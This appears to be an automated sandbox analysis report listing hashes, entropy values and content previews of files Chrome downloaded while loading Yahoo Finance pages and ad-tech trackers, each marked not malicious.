                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:tr2bYPjihgGOlKGueiZuKGTaDmAZ779NFv0KwrbDRy1kvSI:tCbYPGPGuXVGTP47XFv0vRSI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BE4B1F70F47D6751177589620FD301B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB745FB62D750A58A57C5EAA596E37D3B0B06C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5C2CE11E474604BDDF10320EEB48A4D3ED75A5999CE32DE90BE3B086DA434131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:55D2390D6DBF52474DE0A74632D44A4830D4CEF87A270EBBF6958D7C0676D48B27B35682D99D9BBC8A7D89D36F2570F2DE3C568E542087ED338FA4138B906CF7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. </defs>. <g fill="url(#a)" fill-rule="nonzero">. <path d="M24 48c13.255 0 24-10.745 24-24S37.255 0 24 0 0 10.745 0 24s10.745 24 24 24z" opacity=".3"/>. <path d="M24 42c9.941 0 18-8.059 18-18S33.941 6 24 6 6 14.059 6 24s8.059 18 18 18z"/>. </g>.</svg>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/crum?cm_dsp_id=131&external_user_id=18072662171507206768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://eus.rubiconproject.com/usync.html?p=medianet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65354)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):98590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.262081609860911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:l6uJO46KoxxmzxgwyPtXjgypu5DUWCsHEGh363pz1ndumnf:KrxhPSyp0R63pR7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:93C71F7FAF9DCA7767823C99109C81D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:01E7B25914D48BB4DD3CD2E6F60CFCD99CAA10EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:66776998B10E583A72F8FD29391A50E2C80EB3BC9A65B0DAFE97E576D7D88507
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3E02E2F714D1FB066FFD376FACFD936E75D01D6862D4F7FC353B1D0E725FE3294BBAAE85268DB46541AC7B55D44AC8721A685113FA0D8FD617B323D6DE768B7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://static.criteo.net/js/ld/publishertag.prebid.144.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:// Hash: ioxxdjHDzFBt50jsKHcULoEjfPjn7FupHUObUXTEulH1iImcaT1OYYq4nXedv+v6ystL/mciw43eN2N1sBqukEcB1G3yLaozwAQoZarIvpe+op2I8dDWCrnmQL5aA3TRFA2hIGMEsGDPdljIfZlxPKB5Tt8rZMkwd8T+7UEJODk=.!function(e){"use strict";var n=function(e,t){return(n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var i in t)t.hasOwnProperty(i)&&(e[i]=t[i])})(e,t)};function t(e,t){function i(){this.constructor=e}n(e,t),e.prototype=null===t?Object.create(t):(i.prototype=t.prototype,new i)}var L=function(){return(L=Object.assign||function(e){for(var t,i=1,n=arguments.length;i<n;i++)for(var r in t=arguments[i])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function i(e,t){var i={};for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&t.indexOf(n)<0&&(i[n]=e[n]);if(null!=e&&"function"==typeof Object.getOwnPropertySymbols){var r=0;for(n=Object.getOwnPropertySymbols(e);r<n.length;r++)t.indexOf(n[r])<0&&Object.prototype.pro
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8260), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238261028208202
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:L2JhEpTVHpBTRgbW8DdlWzMEqt16lOTlKW5BCNaCV5WgeTYy3:L2JhEjpBKC8DjWpc16oBKAAaqeky
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DFA69F455EFA8A49A71AF52519927C3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:07E3A5A50D74E9150408B2D5A50AE1242F6A5A33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6014DBEF5594ADD5F4104CE8597BC8C6B755E9DCA6B32E40EB04246E55588406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:72673CB76FB5C77B570C44AD5A156DD634C9E57E8C1FF0845C9C021FA492061804FE07C7C8CBEEA8049C3644C4352C17A575903428C1ACC00255E38C27F4D010
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:webpackJsonpwafer_wafers_wafer_autocomplete([0],{"./src/types recursive ^\\.\\/.*$":function(e,t,r){function a(e){return r(s(e))}function s(e){var t=i[e];if(!(t+1))throw new Error("Cannot find module '"+e+"'.");return t}var i={"./aol-location":"./src/types/aol-location.js","./aol-location.js":"./src/types/aol-location.js","./aol-markets":"./src/types/aol-markets.js","./aol-markets.js":"./src/types/aol-markets.js","./aol-recipes":"./src/types/aol-recipes.js","./aol-recipes.js":"./src/types/aol-recipes.js","./gossip":"./src/types/gossip.js","./gossip.js":"./src/types/gossip.js","./sports-teams":"./src/types/sports-teams.js","./sports-teams.js":"./src/types/sports-teams.js","./weather":"./src/types/weather.js","./weather.js":"./src/types/weather.js"};a.keys=function(){return Object.keys(i)},a.resolve=s,e.exports=a,a.id="./src/types recursive ^\\.\\/.*$"},"./src/types/aol-location.js":function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),r.d(t,"getListMarkup",functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:C source, Unicode text, UTF-8 text, with very long lines (19842)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):19846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.543777580724979
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:MCQmhIGpmU5WD2crxz3kshY7DMu8kbudc4TPr5951/Esht8Ay/ckvrJ:MCHrxWSRadc4TPrVJth2Jcs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4CA7E5F4719318A39BDCEF633AAA4104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AAC987C8F0CD9001D5F501BDC8B0A4033C065849
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:566D2BAAC13A1BD5AF3239B6BA18BD54F656D15F1374DEAC960F4AC9169B40C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BC803E7FC26B34043D68787011F2A271E399DD90485ED66D9E315CF06F70BD397302DB4240E970D2A82C9D653CA65A1FE1BA099F0E8264E617B4872795C4BD88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Sparkline.svelte_svelte_type_style_lang.BXw0JgFc.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function Mr(e){return typeof e=="number"}60*new Date().getTimezoneOffset()*1e3;const Be=/(\d+)px/i;function xr(e){return+Be.exec(e)[1]}function $r(e,r){return Math.ceil(e.measureText(r.replace(/\d/gi,"0")).width)}function Nr(e,r,n,t="transparent"){e.clearRect(0,0,r,n),t&&(e.fillStyle=t,e.fillRect(0,0,r,n))}function kr(e,...r){return r.forEach(n=>{n!==null&&typeof n=="object"&&Object.keys(n).forEach(t=>{n[t]!==void 0&&(e[t]=n[t])})}),e}const me=typeof window<"u"&&window.XDomainRequest,ye=typeof window>"u"||"withCredentials"in new XMLHttpRequest;function Er(e,r){const{host:n="https://query1.finance.yahoo.com",path:t,partner:i="",query:o}=e;o.corsDomain=window.location.host,i&&(o[".tsrc"]=i);const u=`${n}${t}?${function(f){return Object.keys(f).map(g=>{const c=f[g],h=Array.isArray(c)?c.join(","):c;if(h!=null)return`${g}=${encodeURIComponent(h)}`}).filter(Boolean).join("&")}(o)}`,a=function(f){let g;return ye?(g=new XMLHttpRequest,g.open("GET",f,!0)):me&&(g=new me,g.open("GET",f)),g}(u);if
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9942)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):9943
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.478144666795485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:ZGA/xs0ISjFv6qP/q+AbbD7G+FOuyTaIHFN13ky9bdp6rMfhpy3Ed8npZU9kppAo:cA/rzjt6GHubDngwIf13kmp6r6hpgPnl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0197DDA29755E796F677ECD5B676C652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:648E11B3088DCC03D43DDCC492E44B97551CDDF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7603D06E97A81BCDA5B384A3DE65869ABBA0866083372B862AFDE3A9ECB3CC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:190E08A9C02A7784B2A03ADD05E96C4F31811944D960239B3D814940E27DD532112AC952797AEC9463A30D7DED97492D96C08407E36ECED0C0620AA9E515600D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as oe,p as z,k as v,i as b,c as de,A as ge,e as U,b as Q,d as E,f as T,j as H,q as k,U as u,a8 as ae,l as w,u as ce,g as he,a as be,a9 as F,t as V,h as D,_ as j,n as B,C as te,m as G}from"./scheduler.Dr9AAxFe.js";import{S as ke,i as Ne,t as A,g as Y,a as C,e as J,c as ye,b as ve,m as Pe,d as Ie}from"./index.DCSmZEjO.js";import{g as we}from"./spread.CgU5AtxT.js";import{g as Ae,o as Se,P as Ce,Q as Ue}from"./commonUtil.CI22_Irn.js";import{g as Ee}from"./i13nUtil.C-uBpR7k.js";import{I as Le}from"./Icon.BSWt_jx8.js";/* empty css */const Me='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 19H5V5h7V3H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2h14c1.1 0 2-.9 2-2v-7h-2zM14 3v2h3.59l-9.83 9.83 1.41 1.41L19 6.41V10h2V3z"/></svg>';function Fe(i){const e=i.slice(),t=e[2]||!e[9]||!e[18];return e[32]=t,e}function ie(i){let e=i[13],t,a,l=i[13]&&O(i);return{c(){l&&l.c(),t=z()},l(n){l&&l.l(n),t=z()},m(n,r){l&&l.m(n,r),v(n,t,r),a=!0},p(n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.75561863721865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JSXE4Dag5Ne5Nfjk1eAdVMJFJXRzv:W75NcYUAdi5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D7200E758FCEBE06761921F35B9E3FD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:667E34732CB9738BCF9938BD4CAE49FDA31C0EAC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1D4CB2B2164C6097E5B7DB3DDC1357888F154D41A075D7C01B1214C05273185
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:55A1F2F4B2FCF971D6CA6C5404F2EACE1AA02320304AE53A0C8113C81C6C485AE685EBE807243693A07CB48EF42E98F11D8BD0C684E3B0C8B4A5EC9198177974
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/entry/start.CnQ-Ug7B.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as a}from"../chunks/43.CtYdpA_T.js";export{a as start};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1465)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1466
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.14639284041708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:006pL7mk9o7KJB7jWAJ34LT2+LbngEXHLbQbLT2+Lbw7LbFXTQLT2+Lb27LbMz66:0061mkiMBfWA94++HngEXHHQb++Hw7HI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:74B4EE719FC6F107EFF0C63EAB2B1726
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B84F0B38A715C2783AAB8EEFD774C6A99A73F768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9A834EDE4FDC8F8FA0611FA7541AE9E8EFFD33C4B3514EE057DD31D4FB577DF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D2A86E3B038CCA5D5ECE804DC1E649F52F12E63FB2C55FBBC6A2FAB2154B273FDFDBD160B9263D607C3FE9ACD93E1B5B890F7625A29F98A0E766F55E72DB1541
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/i13nUtil.C-uBpR7k.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const c=["dock-rmp","dock-upsell-rmp-dialog","footer-rmp"],r=n=>!n||typeof n!="object"?"":Object.keys(n).map(o=>n[o]!==void 0&&`${o}:${encodeURIComponent(n[o])}`).filter(Boolean).join(";");function s(n){return n?Object.fromEntries(n.split(";").map(o=>{const[e,i]=o.split(":");return[e,decodeURIComponent(i||"")]})):{}}function d(n,o,e,i){if(window&&window.rapidInstance&&typeof window.rapidInstance.beaconClick=="function"){const t=Object.assign({},{etrg:"click"},e.pp);delete e.pp,window.rapidInstance.beaconClick(n,o||"-",e._p||0,e,e.outcm||"clicked",i,{pp:t})}}function p(n,o){window&&window.rapidInstance&&typeof window.rapidInstance.beaconEvent=="function"&&window.rapidInstance.beaconEvent(n,o,o.outcm||"event")}function f(n){window&&window.rapidInstance&&typeof window.rapidInstance.beaconPerformanceData=="function"&&window.rapidInstance.beaconPerformanceData({perf_usertime:{utm:n}})}function w(){const n="nimbus-app",o="nimbus-finheader",{rapidInstance:e}=window;e&&[n,o,...c].forEach(i=>{i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=one_tag&google_hm=&google_push=AXcoOmR1wC49FkNk2XxM3zwjUptnL8qs1II7mcfapVFr4YU0LMq_WuZPRCFdmBS7NWDmgahxSZ_VlrlmGi_DVt32RD95lwYyK3p-Vw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.018842182930725
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:qxzr5VAhJG7suzHb7j3nJh/afzXOpaFgTZtHyPz0KS:A5CMz77TL/a7XIaFglR/h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:50A1E8FF80F1FF894CDC1B1991F59A1D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A27993874ED67D49CF6222C598B6F645C2140FA9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EBBCF691C85A92EC72DF2C2B8A379983A545365BE2FFC0C14B37ADF3352FABB0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:14F01D5C69FE44B141732297DA05B4624CB18C992F4B382958D903C9B857D2F74C633F4E3325291CB10FABC1EF293C277A37984442F1C96DB5D7AE7273686B21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=xfad&tv=01_250&st=int
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"sodar_query_id":"rYQFZ5m_MtWWjuwPkZW_0QQ","injector_basename":"sodar2","bg_hash_basename":"_AApIiWo-qoygbJTte9jDqAiWCWSDTrVJ4yIX1hHtxY","bg_binary":"SGaw07lNDjx9g3RAFLSWbGydQkt8JwUjDRMelo/ZD/4GJOA9Ewvpb4RrH+GmvgbyI6loSAlWS22Q8J7hDpdmCCBrl1bCXvjEkEPN3CXT3NBYSxzonHtAy53ejtG+LHt4kzIIOU+hz+t9ChPbvE6Naeslc42bTy3nt/x/Y/6a251WPupbRT6ChCejkgH1Mzc28dugHF72OvfTj52tCiVXauJ22CN4alSAWkQ3RC/GldTGDnfhXBB9La66LkEXLnhL7JM2NxLkdJR0O4O84t1ps2LUgKhbQGviOS2tFiD9Vot44ULX7My232JKd36pvaCWUa6QUsHMogcodl92dXUsQ/s1TWIxWBeizHwQGEv61rKk6zegRDR1GEUH/vQv1TQDxfSjgaD6RY7sOuoLV24C5X0v2rYzF1067n1mAFnF1IZ2nPROLwgdOwHXnuYJ236jsfI4USOTng9j3pEmJq6LX5BPqGxXBhcAO+NIiEsJrH0sdXTAaGAdKWeU8OQxDv/aZjrJrEdqtf0JhiMNFuZpCLtO4QmaJZob5AGxqI9gMXaEXKDlxDcDFlQErcUuQFwqfVWdI09BDOjvkZoNgJkT5MFBbR8LN75yDs+MQ/hzJ0eFVUXlSZQKBYSq3NdrY4D1gOk/07NHHzhMb2JFr+jUTyBFwgd8dZAsHcirDH5/UULiNKz1iVquOihJdWyxue9/Aq4JKpdL4xd3tVN8RtkU+XPhEetkqTzi+ngLzdxg5+JUJnu4seNWe/torgIWTdNNW6gKFHMo3KTiBqkzAmevnqDIyI4j/J8SOni2QltAWGl/bv/AFBojamlCpCh4qZyh6bM1x9NXjnxCGLgwB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3657)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.410059487154183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:XSJl3HI3LCOsF1ArzG+FLbqXCEQVQjep7V83e7SjnKOtCy6YIC0fqI4DgPXp:CJlomOk1ArFLbH83e7+KjC5IQgvp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:45AEAC14EDCBA7E29BDE89A7704500A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7ECEE407E55800FF6B284B25DEA347FE3869DC40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B6BFE34FB12F1E696B601E961E9D694E392FAF635D1F47829832B76D1EFFE2E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D16EC994CF3E6F93DD8707AFDC8FFD6A3D8E24EA2A143333ABEA2E02E5F2F4F874542EF56AE873C57E92C021EBD24220EB1F91C27B82DC40A2112BAE0ADF6F0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Button.DpT5MMuf.js
